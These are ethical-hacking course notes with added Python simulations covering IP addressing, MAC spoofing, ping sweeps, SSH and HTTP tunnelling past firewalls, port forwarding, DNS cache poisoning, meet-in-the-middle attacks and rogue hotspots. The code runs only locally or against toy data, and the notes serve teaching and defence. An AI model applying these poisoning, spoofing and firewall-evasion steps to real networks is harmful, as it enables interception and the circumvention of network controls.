
Ankit Fadia Ethical Hacking Notes

These notes are taken from the Ankit Fadia Certified Ethical Hacker (AFCEH) course, version 5.0.
The course videos are not included with this PDF; only the notes, with their images, are reproduced here, along with important questions and FAQs from AFCEH. For any query related to this e-book, you are kindly requested to email me at

Internet Protocol (IP Address)
An attacker's first step is to find out the IP address of the target system (the victim's computer). Every system connected to a network has a unique IP address. An IP address identifies a computer the way a phone number identifies a person: if I want to connect to your computer, I must know your computer's IP address. An IPv4 address is a 32-bit number written as 4 fields of 8 bits each (octets), separated by dots; each field holds a number between 0 and 255, so addresses run from 0.0.0.0 to 255.255.255.255.

For example, an IP address reveals a lot of information about the network it belongs to. In classful addressing the class is determined by the first octet:
Class A: 0.0.0.0 to 127.255.255.255 (0 and 127 are reserved, so usable Class A networks are 1 to 126)
Class B: 128.0.0.0 to 191.255.255.255
Class C: 192.0.0.0 to 223.255.255.255
Class D: 224.0.0.0 to 239.255.255.255 (multicast)
Class E: 240.0.0.0 to 255.255.255.255 (reserved)
Note that the Internet has used classless (CIDR) routing since the 1990s; the classes are still worth knowing because many tools and textbooks refer to them.

Class A: the first 8 bits are the network ID and the last 24 bits the host ID. Class B: the first 16 bits are the network ID and the last 16 bits the host ID. Class C: the first 24 bits are the network ID and the last 8 bits the host ID. Class D: all 32 bits form a multicast group ID. Class E: reserved, not in use.

Network Address Translation(NAT)
Network Address Translation is a workaround for the IPv4 address shortage. A 32-bit address gives only about 4.3 billion addresses, far fewer than the number of devices that want to be online, so there are not enough addresses to give every host its own. The obvious solution is to redesign the address format to allow more addresses. That redesign (IPv6) exists, but it is taking many years to deploy because it requires changes across the entire infrastructure of the Internet. This is where NAT comes to the rescue. NAT allows a single device, such as a router, to act as an agent between the Internet (the "public" network) and a local ("private") network: only a single, unique public IP address is needed to represent an entire group of computers, and the router rewrites the source address and port of outgoing packets (and the destination of the replies) so that many internal hosts can share it.

Internal V/s External IP
Internal IP addresses are private addresses used and recognised only inside the local area network (LAN). They come from the ranges reserved for private use (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16), are never routed on the public Internet, and so can be reused by any number of LANs. The external IP address is the public address assigned to your connection by your Internet Service Provider (ISP); with NAT, every computer on the LAN appears on the Internet under this one address.
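As an added illustration (this code is not part of the original notes), the following Python example classifies any IPv4 address into its class, splits it into network ID and host ID along the classful boundaries described above, and checks whether it falls in one of the private (RFC 1918) ranges. The sample addresses at the bottom are made up for the demonstration.

```python
import ipaddress

# Classful boundaries: (class, leading-bit pattern, number of leading bits,
# network bits).  Class D and E have no network/host split.
CLASS_TABLE = (
    ("A", 0b0,    1, 8),    # first octet 0..127
    ("B", 0b10,   2, 16),   # first octet 128..191
    ("C", 0b110,  3, 24),   # first octet 192..223
    ("D", 0b1110, 4, None), # first octet 224..239, multicast group ID
    ("E", 0b1111, 4, None), # first octet 240..255, reserved
)

# Private ranges that are never routed on the public Internet (RFC 1918).
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def ip_class(addr):
    """Return (class letter, network bits, host bits) for a dotted-quad address."""
    first_octet = int(ipaddress.IPv4Address(addr)) >> 24
    for name, pattern, nbits, net_bits in CLASS_TABLE:
        if first_octet >> (8 - nbits) == pattern:
            host_bits = None if net_bits is None else 32 - net_bits
            return name, net_bits, host_bits
    raise ValueError("unreachable: every first octet matches a class")


def split_classful(addr):
    """Return (network ID, host ID) as dotted quads, or None for class D/E."""
    _, net_bits, _ = ip_class(addr)
    if net_bits is None:
        return None
    ip = ipaddress.IPv4Address(addr)
    net = ipaddress.IPv4Network((int(ip), net_bits), strict=False)
    host_id = int(ip) & int(net.hostmask)
    return str(net.network_address), str(ipaddress.IPv4Address(host_id))


def is_private(addr):
    """True if addr is an internal (RFC 1918) address."""
    ip = ipaddress.IPv4Address(addr)
    return any(ip in net for net in RFC1918)


def describe(addr):
    cls, net_bits, host_bits = ip_class(addr)
    parts = split_classful(addr)
    scope = "private (LAN only)" if is_private(addr) else "public"
    if parts is None:
        return f"{addr}: class {cls}, no network/host split, {scope}"
    return (f"{addr}: class {cls} ({net_bits}-bit network ID {parts[0]}, "
            f"{host_bits}-bit host ID {parts[1]}), {scope}")


if __name__ == "__main__":
    # Constructed sample addresses for the demonstration.
    for sample in ("10.1.2.3", "172.20.0.1", "192.168.1.77", "8.8.8.8", "224.0.0.9"):
        print(describe(sample))
```

Note that 172.32.0.1 is public even though it "looks" like 172.16.x: the private block is a /12, so only 172.16.0.0 through 172.31.255.255 is reserved.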

How to Find out your Internal IP address ?
Go to Start > Run, type cmd, and in the command prompt that opens type ipconfig. The IPv4 Address line of the active adapter is your internal address.

How to Find your External IP address ?
Visit a website that displays the public address your request arrived from, or look at the WAN (Internet) status page of your router; either shows the external address assigned by your ISP.

Media Access Control(MAC) address
Every NIC (Network Interface Card) has a unique hardware address. A MAC address is a 48-bit number written as 12 hexadecimal digits, for example 00-1e-a6-02-03-7e; the first 6 digits identify the manufacturer. How to find your MAC address? Open a command prompt and type ipconfig /all; the "Physical Address" line of each adapter is its MAC address. Typing arp -a displays the ARP cache instead, that is, the IP-to-MAC mappings of the other hosts on your LAN that your machine has recently communicated with.

MAC address Spoofing
MAC address spoofing means changing the MAC address your adapter uses into one of your choosing. On Windows you can use a tool such as EtherChange to do this; the new address is stored in the adapter's driver settings, and the hardware address burned into the card itself is not modified, so the change is reversible.

How to do Mac Spoofing ?
Download and install EtherChange on your system. Open a command prompt, type etherchange and select your network adapter from the menu displayed. Then select 1 (Specify a new Ethernet address) and type the new address. A success message will be displayed on the screen. Now go to Network Connections and disable and re-enable the network adapter so that the new address takes effect; confirm it with ipconfig /all.

How to Find MAC address of Remote System ?
Run a packet sniffer (Wireshark, its older name Ethereal, or WinDump) on your computer.
For example, with Wireshark: download, install and run it. You can see all the data packets sent or received on your network segment, with their source and destination IP addresses. Select a packet to or from the victim's IP address and expand the "Ethernet II" line in the packet details; it shows the source and destination MAC addresses. Note that this only works for systems on the same LAN segment as you: if the victim is behind a router, the MAC address you see is that of the router's interface, because MAC addresses are rewritten at every hop.

FPort is a tool (from Foundstone) that lists all open TCP and UDP ports on the local machine together with the process that owns each one, which is a good way to identify whether a trojan is listening. Download FPort, install it on your system and run it from a command prompt by typing fport

It shows, for each open port, the process ID, the process name, the port number, the protocol and the path of the running program. Hence we can check which ports are open and which daemons are using them. On current Windows versions the built-in command netstat -ano gives the same port-to-PID mapping, and tasklist /fi "PID eq <pid>" resolves a PID to its program.

Ping Sweeping
Ping is used to determine whether a target system is reachable over the network. It makes use of the Internet Control Message Protocol (ICMP): the attacker sends an ICMP Echo Request to the host, and if the host replies with an ICMP Echo Reply we conclude that the target is up and connected. If the host does not respond, the target may be down, but it may also simply be configured (or protected by a firewall) to drop ICMP, so the absence of a reply is not proof that a system is offline. A ping sweep repeats this for every address in a range to discover which hosts are alive.

How to Ping ?
Open a command prompt, type ping [hostname or IP address] and press Enter.

If the system is alive it will display replies, as in the image above.

Uses of Ping Sweeping
DoS attacks
OS detection

Tools Available
Cping
SuperScan
Nmap
WS_Ping ProPack

Ping Sweep: Detection
A ping sweep is easy to spot by manual or automated traffic monitoring: one source sends ICMP Echo Requests to many different addresses in a short time, which normal traffic rarely does. Intrusion detection systems and firewall logs can flag this pattern.
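The following Python example is added here and is not from the course material. It shows both sides of the section above: how an ICMP Echo Request is built (the RFC 1071 checksum, identifier and sequence number) and how a sweep over a range produces one request per host, and then the detection rule from the last paragraph applied to a constructed traffic log (timestamps, addresses and the 10.0.0.0/24 range are made up). Sending the packets would need a raw socket and administrator rights, so that step is left out.

```python
import ipaddress
import struct
from collections import defaultdict

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def icmp_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words (pads odd length)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type, ident, seq, payload=b"abcdefgh"):
    """ICMP echo request/reply: type, code 0, checksum, identifier, sequence, payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo_reply(packet):
    """Return (identifier, sequence) for a valid echo reply, else None.
    For an intact packet the checksum recomputed over the whole packet is zero."""
    if len(packet) < 8 or icmp_checksum(packet) != 0:
        return None
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type != ICMP_ECHO_REPLY or code != 0:
        return None
    return ident, seq


def sweep_packets(network, ident=0x1234):
    """One echo request per host in the network, keyed by destination address."""
    hosts = ipaddress.ip_network(network).hosts()
    return {str(h): build_echo(ICMP_ECHO_REQUEST, ident, seq)
            for seq, h in enumerate(hosts, start=1)}


def detect_ping_sweeps(records, threshold=10, window=60.0):
    """records: (timestamp, src, dst, icmp_type).  Flag every source that sent
    echo requests to more than `threshold` distinct hosts within `window` seconds."""
    by_src = defaultdict(list)
    for ts, src, dst, icmp_type in records:
        if icmp_type == ICMP_ECHO_REQUEST:
            by_src[src].append((ts, dst))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {dst for _, dst in events[start:end + 1]}
            if len(distinct) > threshold:
                flagged[src] = max(flagged.get(src, 0), len(distinct))
    return flagged


def constructed_log():
    """Constructed traffic records: a scanner hitting 10.0.0.1-30 within 3 seconds
    and a workstation that only pings its gateway every 5 seconds."""
    records = [(0.1 * i, "10.0.0.99", "10.0.0.%d" % (i + 1), ICMP_ECHO_REQUEST) for i in range(30)]
    records += [(5.0 * i, "10.0.0.5", "10.0.0.1", ICMP_ECHO_REQUEST) for i in range(30)]
    return records


if __name__ == "__main__":
    print("echo request:", build_echo(ICMP_ECHO_REQUEST, 0x1234, 1).hex())
    print("sweep of 10.0.0.0/29 builds", len(sweep_packets("10.0.0.0/29")), "packets")
    print("sweep sources:", detect_ping_sweeps(constructed_log()))
```

The detector keys on distinct destinations per source inside a sliding window, which is what separates a sweep from a host that pings one gateway repeatedly; the same rule works on firewall logs if you map their fields onto the record tuple.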

Firewall Tunneling using SSH & Putty

Let's assume that you are connected to the Internet and are behind a firewall that doesn't allow you to make outgoing connections to port 25 (SMTP) and port 80 (HTTP) of remote computers. However, you really need to establish such connections.
What do you need to do ?

It may be that the firewall has not blocked outgoing connections to port 22 (SSH). This means that you can use PuTTY to create an SSH tunnel through the firewall (over port 22) to an SSH server that you have access to, and then use that tunnel to reach the blocked remote systems.

- Set up your own SSH server outside the firewall, or register for an account on one that has unblocked access to the Internet.
- Use PuTTY to create an encrypted SSH connection to the remote SSH server (outgoing port 22; the local firewall allows it and cannot see inside the encrypted stream). In PuTTY this is configured under Connection > SSH > Tunnels: a local source port and a destination of the form host:port. PuTTY then listens on that local port, and anything you connect to it is carried through the tunnel.
- The SSH server makes the actual connection to the blocked system and relays the data back through the tunnel, so the firewall only ever sees SSH traffic to port 22.

HTTP Tunneling
Many times we find ourselves in networks that block access to certain websites or don't allow certain applications (chat, gaming, etc.) to communicate. HTTP tunnelling allows users who are behind such restrictions (firewalls or proxy servers) to hide their real traffic inside innocent-looking HTTP requests and responses, typically to a tunnel server on the outside that unpacks them, hence fooling the restrictions in place. Since almost every network has to allow outbound HTTP, this is one of the hardest channels to block without inspecting content.

Port Forwarding
Typically in a home or office environment, most users access the Internet through a router. The router has a public IP address and can be seen by everybody on the Internet. All users behind the router are invisible to the Internet, since each of them has an internal (private) IP address that cannot be reached from outside; by default the router does not know which internal machine an unsolicited incoming connection is meant for. This is where port forwarding comes into the picture. Port forwarding is a rule on the router that says: connections arriving at the public address on port X are to be sent to internal host Y on port Z. It allows you to reach a computer behind a router from anywhere on the Internet. Normally from the Internet you can only reach the router itself, but with port forwarding you can reach the computers behind it. For example, you may wish to access files on your home computer while you are travelling abroad or at work. Port forwarding is also used to run a web server at home, to host online games, to speed up P2P file-sharing tools (which need inbound connections), and for other useful things. Remember that every forwarded port exposes that internal service directly to the whole Internet, so the service must be kept patched and password-protected.
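Both the SSH tunnel above (PuTTY listening on a local port and relaying to a destination behind it) and a router's port forward are the same mechanism: a listener on one address that accepts connections and copies bytes to and from another address. The following Python example, added here and not part of the course, implements that relay with plain sockets and exercises it entirely on the loopback interface: a made-up "blocked" service that answers in upper case, a forwarder in front of it, and a client that only ever talks to the forwarder. The message text, ports (chosen by the OS) and service behaviour are all constructed for the demonstration.

```python
import socket
import threading


def _pipe(src, dst):
    """Copy bytes one way until src closes, then half-close dst so the peer sees EOF."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(listen_port, target_host, target_port, listen_host="127.0.0.1"):
    """Listen on listen_host:listen_port and relay each accepted connection to
    target_host:target_port.  Returns the listening socket (its port is
    getsockname()[1], useful when listen_port is 0).  Whoever connects to the
    listener never learns the real destination; only the forwarder does."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((listen_host, listen_port))
    listener.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = listener.accept()
            except OSError:          # listener closed: shut down the loop
                return
            upstream = socket.create_connection((target_host, target_port))
            threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener


def start_toy_service():
    """Constructed stand-in for the 'blocked' service: echoes the request in upper
    case.  Returns the port it listens on."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(5)

    def serve():
        while True:
            try:
                conn, _ = server.accept()
            except OSError:
                return
            with conn:
                chunks = []
                while True:
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    chunks.append(chunk)
                conn.sendall(b"SERVICE:" + b"".join(chunks).upper())

    threading.Thread(target=serve, daemon=True).start()
    return server.getsockname()[1]


def demo_forward(message=b"hello through the tunnel"):
    """Client -> local forwarder -> toy service, all on loopback; returns the reply."""
    service_port = start_toy_service()
    forwarder = start_forwarder(0, "127.0.0.1", service_port)
    local_port = forwarder.getsockname()[1]
    with socket.create_connection(("127.0.0.1", local_port)) as client:
        client.sendall(message)
        client.shutdown(socket.SHUT_WR)          # EOF travels through the relay too
        reply = b""
        while True:
            chunk = client.recv(4096)
            if not chunk:
                break
            reply += chunk
    forwarder.close()
    return reply


if __name__ == "__main__":
    print(demo_forward())   # SERVICE:HELLO THROUGH THE TUNNEL
```

In the SSH case the two halves of the relay live on different machines and the link between them is encrypted; in the router case the relay is the NAT rule itself. The half-close handling in _pipe matters in practice: without it, protocols that rely on EOF (like the toy service here) hang behind the forwarder.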

DNS Attacks
A DNS (Domain Name System) lookup is a query sent by a client (browser, IM or email client) to a DNS server to convert a domain name into its IP address. A reverse DNS lookup is a query that converts an IP address into its domain name (via the in-addr.arpa tree). Since nearly every connection starts with a lookup, an attacker who controls the answers controls where the victim connects.

There are various websites that allow you to play around with DNS lookups:

DNS Poisoning Attacks
Most users use a DNS server close by (at their ISP or college network) to perform lookups. Hence a single DNS server handles lookups for anywhere between a few dozen and many thousands of users. To improve performance, DNS servers cache lookup results for the lifetime (TTL) of each record. A DNS cache poisoning attack allows an attacker to plant a false record in this cache, changing the IP address to which a domain name points; the server then returns the false address to every user who looks up that domain until the record expires.


DNS Poisoning Sniffing ID Attack
Step 1: The attacker sends a DNS lookup request for a particular domain (one the victim server does not have cached) to the victim DNS server, from a spoofed IP address.
Step 2: The victim DNS server forwards the lookup to the authoritative name server for that domain. This request carries a 16-bit transaction ID (the query ID), and the server will only accept a reply bearing the same ID.
Step 3: The attacker runs a packet sniffer on the same network segment as the victim DNS server and records the ID of the request sent to the authoritative name server.
Step 4: The attacker sends a reply with the sniffed ID and false information (a malicious IP address) back to the victim DNS server, spoofing the authoritative server's address. The reply must arrive before the genuine one.
Step 5: The victim DNS server now caches the false record for that domain. If an unsuspecting user queries the server for that domain, the user is sent to the false (malicious) website. The DNS cache has been poisoned.
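As an added example (not from the course), the following Python code builds the DNS query and response messages involved in the steps above with a minimal hand-written encoder, and models the victim's resolver as an object that remembers its outstanding queries and caches a reply only if the transaction ID, the question name and the source IP:port all match. The demo then replays the sniffing attack: a forged reply with a guessed ID is dropped, the same reply with the sniffed ID is accepted. The domain names, addresses and the ID-generation details are constructed for the illustration; real resolvers today also randomise the UDP source port, which this toy keeps fixed at 53 to mirror the attack as described.

```python
import random
import struct


def encode_name(name):
    """example.com -> b'\\x07example\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"


def parse_name(msg, offset):
    """Decode an uncompressed name starting at offset; return (name, next offset)."""
    labels = []
    while True:
        length = msg[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(msg[offset:offset + length].decode())
        offset += length


def query_id(packet):
    """The 16-bit transaction ID is the first field of every DNS message."""
    return struct.unpack("!H", packet[:2])[0]


def build_query(txid, name):
    """Standard recursive query for an A record (flags 0x0100 = RD)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def build_response(txid, name, ip, ttl=300):
    """Response with one A record.  The answer name is a compression pointer
    (0xC00C) back to the question name at offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(msg):
    """Return (txid, question name, A record) of a response built as above."""
    txid, flags = struct.unpack("!HH", msg[:4])
    if not flags & 0x8000:
        raise ValueError("not a response")
    name, off = parse_name(msg, 12)
    off += 4 + 2                      # qtype, qclass, then the 2-byte name pointer
    rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
    off += 10
    if rtype != 1 or rdlen != 4:
        raise ValueError("unsupported record")
    return txid, name, ".".join(str(b) for b in msg[off:off + 4])


class CachingResolver:
    """Toy recursive resolver: remembers outstanding queries and only caches a
    reply whose transaction ID, question and source IP:port all match one."""

    def __init__(self):
        self.pending = {}   # txid -> (name, upstream ip, upstream port)
        self.cache = {}     # name -> ip

    def send_query(self, name, upstream_ip):
        txid = random.randrange(65536)
        self.pending[txid] = (name, upstream_ip, 53)
        return txid, build_query(txid, name)   # the bytes a sniffer on the LAN sees

    def receive(self, packet, src_ip, src_port):
        try:
            txid, name, ip = parse_response(packet)
        except ValueError:
            return False
        if self.pending.get(txid) != (name, src_ip, src_port):
            return False
        self.cache[name] = ip
        del self.pending[txid]
        return True


def demo_sniffed_id_attack():
    """Constructed scenario: the attacker sniffs the ID and forges the reply."""
    resolver = CachingResolver()
    authoritative = "198.51.100.53"
    _, wire_query = resolver.send_query("bank.example", authoritative)
    sniffed_id = query_id(wire_query)             # read straight off the wire
    wrong_id = (sniffed_id + 1) & 0xFFFF
    miss = resolver.receive(build_response(wrong_id, "bank.example", "203.0.113.66"), authoritative, 53)
    hit = resolver.receive(build_response(sniffed_id, "bank.example", "203.0.113.66"), authoritative, 53)
    return miss, hit, resolver.cache.get("bank.example")


if __name__ == "__main__":
    print(demo_sniffed_id_attack())   # (False, True, '203.0.113.66')
```

The receive() check is the whole defence a classic resolver has: 16 bits of ID plus the addresses and ports. With the ID sniffed, the forged answer is indistinguishable from a genuine one, which is why the race in Step 4 is the only thing the attacker still has to win.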

DNS Cache Poisoning Birthday Attack
Step 1: The attacker sends n DNS lookup requests for the same domain name to the victim DNS server, each from a different spoofed source IP address.
Step 2: The victim DNS server forwards all n lookups to the authoritative DNS server in order to resolve the query (this requires a server that does not merge identical outstanding queries). Each forwarded request has a different transaction ID, and the victim server is now waiting for n different replies for the same domain. The ID field is only 16 bits long, so its value can range from 0 to 65535.
Step 3: The attacker sends many spoofed replies, appearing to come from the authoritative name server, with false lookup results and different IDs, trying to hit one of the n expected IDs. Against a single outstanding query, m distinct guesses succeed with probability m/65536 (about 1% for 700 guesses). With n outstanding queries, any of the m guesses may match any of the n IDs, and by the birthday paradox the probability rises sharply: with about 700 spoofed queries and 700 spoofed replies it is over 99.9%, which is why the attack is usually described as succeeding at around 700 packets. If any ID matches, the poisoning succeeds.
Step 4: The attacker has to land a correct ID before the victim DNS server gets the genuine reply from the authoritative server. It is possible to slow down that reply by flooding the authoritative server with bogus packets.
Step 5: The victim DNS server stores the false reply in its cache. Now whenever any real user requests that domain, the false answer is returned!

Note: for either attack to work, along with the ID field, the source and destination IP addresses and UDP ports of the forged reply must match the outstanding query. Getting the IP addresses of the victim and authoritative servers is easy, the destination port is usually UDP 53, and the source port used by the victim server can be guessed (older servers used one fixed port for every query) or found with a sniffer. Modern resolvers randomise the source port of every query precisely to add 16 more bits that the attacker has to guess.

The Birthday Paradox
According to the birthday paradox, if there are 23 random people in a room, there is more than a 50% probability that two of them share a birthday. If you ask one person, the chance that they share your birthday is very low (1/365 = 0.27%). Even if you ask 20 people, the chance that one of them matches you is still low (about 5%). However, when you put 20 people in the same room you are comparing every pair, which is 190 comparisons instead of 20, so the probability goes up drastically. With 57 people the probability that two of them share a birthday is about 99%, and with 366 people it reaches 100% (ignoring leap years), since there are more people than days. The same effect is used in cryptanalysis to find collisions in hash functions: if some function f maps inputs to one of N possible outputs, then by feeding it random inputs you expect to see the same output twice after only about 1.2 times the square root of N attempts, which for small N is not many attempts at all. This is why hash outputs (and transaction IDs) must be long enough that the square root of the output space is still out of reach.
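The numbers quoted in the two sections above (23 and 57 people, 700 packets) come from one formula. The following Python example, added here and not from the course, computes the exact collision probability in both settings: the classic birthday problem, and the two-set version used by the DNS attack, where n outstanding queries with distinct IDs face m forged replies with distinct guessed IDs. The packet counts in the table are chosen for illustration.

```python
import math


def collision_probability(space, n, m=None):
    """Exact collision probabilities in a space of `space` equally likely values.

    m is None: probability that at least two of n random draws coincide
               (the classic birthday problem, space=365).
    m given:   probability that a set of n distinct target values and a set of
               m distinct guesses overlap (the DNS ID birthday attack: n outstanding
               queries, m spoofed replies, space=65536).
    """
    if m is None:
        if n > space:
            return 1.0                          # pigeonhole: a collision is certain
        p_none = 1.0
        for i in range(n):
            p_none *= (space - i) / space       # draw i avoids the i earlier values
        return 1.0 - p_none
    if n + m > space:
        return 1.0
    p_none = 1.0
    for i in range(m):
        p_none *= (space - n - i) / (space - i)   # guess i misses all n targets
    return 1.0 - p_none


def draws_for_half_chance(space):
    """Draws needed for a 50% collision: sqrt(2 * space * ln 2), about 1.18 * sqrt(space)."""
    return math.ceil(math.sqrt(2 * space * math.log(2)))


def dns_attack_table(space=65536):
    """Guessing one outstanding query versus the birthday variant with n = m packets."""
    rows = []
    for packets in (100, 300, 500, 700, 1000):
        single = collision_probability(space, 1, packets)
        birthday = collision_probability(space, packets, packets)
        rows.append((packets, single, birthday))
    return rows


if __name__ == "__main__":
    for people in (1, 20, 23, 57, 366):
        print(f"{people:3d} people: {collision_probability(365, people):.4f}")
    print("draws for a 50% collision among 365 days:", draws_for_half_chance(365))
    print("draws for a 50% collision among 65536 IDs:", draws_for_half_chance(65536))
    for packets, single, birthday in dns_attack_table():
        print(f"{packets:4d} packets: single query {single:.4f}, birthday {birthday:.4f}")
```

The table makes the defensive point concrete: 700 replies against one query is a 1% gamble, 700 against 700 is near certainty, and a resolver that also randomises its source port multiplies the space by 65536, pushing the 50% mark from about 300 packets to about 77 million.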

DNS Attacks :Counter Measures
Forward Confirmed Reverse DNS (FCrDNS) is when the forward lookup and the reverse lookup agree: whenever anybody types a domain name, a DNS lookup is performed to get its IP address, and then a reverse lookup is performed on that IP address to get the domain name back. If there is a match, the FCrDNS check passes. It is mainly used by mail servers to reject spam sources, and it does not by itself prevent cache poisoning. FCrDNS online testing tool:

DNSSEC (Domain Name System Security Extensions) is an extension of DNS in which zone data is digitally signed, so that a resolver can verify that a response really came from the zone's owner and was not altered in transit. It does not encrypt responses (anyone can still read them), but a forged reply, such as the one used in cache poisoning, fails signature validation, which makes these attacks far harder against a validating resolver.

Meet In The Middle Attack
Usually, to convert plaintext into ciphertext, a function controlled by a key is applied to it: Ciphertext = E(Key, Plaintext). We have already seen how cheaply birthday attacks find collisions. To improve security, an obvious idea is to encrypt twice with two independent keys:
Ciphertext = E(Key2, E(Key1, Plaintext))

If each key is n bits long, a brute-force attack on the double encryption seems to need 2^(2n) attempts, as opposed to 2^n attempts when only one key is used, so the two-key scheme looks much stronger. The meet-in-the-middle attack attacks such a two-key scheme from both sides at once. Given a known plaintext and its ciphertext, the attacker encrypts the plaintext under every possible Key1 and stores all 2^n intermediate values (values that have passed through only the first key) in a table. Then the attacker decrypts the ciphertext under every possible Key2, producing intermediate values that have passed through only the second key, and looks each one up in the table. Wherever the intermediate values match, it is highly likely that the Key1 that produced the table entry and the Key2 that produced the lookup value are the two keys in use; a second known plaintext/ciphertext pair weeds out false matches. The total work is about 2 x 2^n operations plus 2^n memory, so the effective strength of double encryption is only about n+1 bits, not 2n. Voila!

Such an attack works against any cascade of two independent keyed encryptions, the classic example being Double DES (two 56-bit keys, effective strength about 57 bits), which is why Triple DES is used instead. It does not apply to Twofish or AES as normally used: they are single-key ciphers, not cascades, and their strength comes from their internal round structure.
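As an added example (not from the course), the following Python code carries out the attack just described against a deliberately tiny cipher: a toy 16-bit block cipher with a 16-bit key, applied twice with two independent keys. The toy cipher, the secret keys and the known plaintexts are all constructed for the demonstration; the point is the shape of the attack, which is identical for Double DES at 2^56 per side. Phase 1 builds the table of 2^16 one-key encryptions, phase 2 tries 2^16 one-key decryptions against it, and surviving candidates are confirmed on the remaining known pairs.

```python
MASK = 0xFFFF
ROUND_CONSTANTS = (0x1234, 0x5678, 0x9ABC, 0xDEF0)


def rotl(x, r):
    return ((x << r) | (x >> (16 - r))) & MASK


def rotr(x, r):
    return ((x >> r) | (x << (16 - r))) & MASK


def encrypt(key, block):
    """Toy 16-bit block cipher with a 16-bit key (four xor/add/rotate rounds).
    Deliberately small so that all 2^16 keys can be enumerated in seconds."""
    for c in ROUND_CONSTANTS:
        block = rotl(((block ^ key) + c) & MASK, 5)
    return block


def decrypt(key, block):
    for c in reversed(ROUND_CONSTANTS):
        block = ((rotr(block, 5) - c) & MASK) ^ key
    return block


def double_encrypt(k1, k2, block):
    return encrypt(k2, encrypt(k1, block))


def attack_cost(key_bits):
    """Naive brute force of the two-key cascade versus meet-in-the-middle."""
    return {"brute_force": 2 ** (2 * key_bits), "meet_in_the_middle": 2 * 2 ** key_bits}


def meet_in_the_middle(pairs):
    """Recover (k1, k2) from known (plaintext, ciphertext) pairs.
    Phase 1: table of E_k1(p0) for every k1 (2^16 encryptions, 2^16 entries).
    Phase 2: for every k2 compute D_k2(c0) and look it up; each match is a
    candidate pair, confirmed against the remaining pairs to weed out false hits."""
    p0, c0 = pairs[0]
    table = {}
    for k1 in range(1 << 16):
        table.setdefault(encrypt(k1, p0), []).append(k1)
    found = []
    for k2 in range(1 << 16):
        middle = decrypt(k2, c0)
        for k1 in table.get(middle, ()):
            if all(double_encrypt(k1, k2, p) == c for p, c in pairs[1:]):
                found.append((k1, k2))
    return found


def demo():
    """Constructed secret keys and known plaintexts; returns the recovered key pairs."""
    k1, k2 = 0xBEEF, 0xCAFE
    plaintexts = (0x4142, 0x4344, 0x4546)
    pairs = [(p, double_encrypt(k1, k2, p)) for p in plaintexts]
    return meet_in_the_middle(pairs)


if __name__ == "__main__":
    print("work for 16-bit keys:", attack_cost(16))
    print("work for Double DES:", attack_cost(56))
    print("recovered keys:", [(hex(a), hex(b)) for a, b in demo()])
```

With a single known pair the table produces on average one false candidate per k2 (2^16 candidates for a 16-bit block), which is why the confirmation step on further pairs is part of the attack and not an optimisation.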

Wireless Network Hacking
Most of you will have used wireless networks in your college, office or at airports. Wireless networks have become very common everywhere due to their convenience and the growing popularity of laptops. An area that offers wireless Internet access is known as a hotspot. Some hotspots provide free Internet access, while others require you to pay and may ask you to enter a password.

Poisoned Hotspots: Many cyber criminals set up open, password-less wireless networks at their home or office, invite unsuspecting users to use them for Internet access, and then use sniffers to snoop on the users' data, capture their passwords, etc. Such networks are commonly known as rogue (or "evil twin", when they imitate a legitimate name) hotspots.

Setting up a wireless network: You will need to buy a wireless router (Linksys or similar) that ideally supports at least the 802.11n wireless standard, plus a wireless adapter for your computer; most laptops nowadays already come with one. Install and set up the wireless router and adapter. It is advisable to configure the security settings properly to avoid misuse of your Wi-Fi network. To configure the wireless router, start your browser and type the router's LAN address (for Linksys, by default http://192.168.1.1). Usually you can enter admin as the username and admin (or sometimes password) as the password. Change this default password first, then configure the settings the way you want, choosing the strongest security available.

The problem with wireless networks is that they broadcast using radio waves, so they can easily be eavesdropped on by anyone in range. This is where encryption standards come into the picture: WEP (not secure at all), WPA (much better, but with known weaknesses), WPA2 (secure when used with a strong passphrase).

Wireless Network Terminology:

